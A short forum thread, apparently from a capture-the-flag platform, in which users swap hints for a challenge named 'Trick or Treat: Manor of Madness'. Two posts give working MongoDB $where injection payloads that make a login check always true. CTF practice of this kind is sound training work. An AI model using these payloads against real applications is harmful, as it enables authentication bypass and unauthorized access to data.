Forum Discussion
immervivesolver
Bronze III
Bronze IIITrick or Treat: Manor of Madness
Any hints or close payloads for last task
This should nudge you in the right direction - MongoDB $where operator JavaScript injection - Web Application Vulnerabilities | Invicti
PRABAKARANRAMAMURTHYBronze III
Bronze IIIHi Samh051,
This query worked for you in the last question?
immervivesolverBronze III
Bronze III{“$where":"this.name == ‘admin’||’1’==‘1’&& this.incantation == ‘admin’||’1’==‘1’“}
PRABAKARANRAMAMURTHY
- PRABAKARANRAMAMURTHY
Thank you immervivesolver.
This worked:
{"$where":"this.name=='admin'||'1==1' && this.incantation =='admin'||'1==1'"}
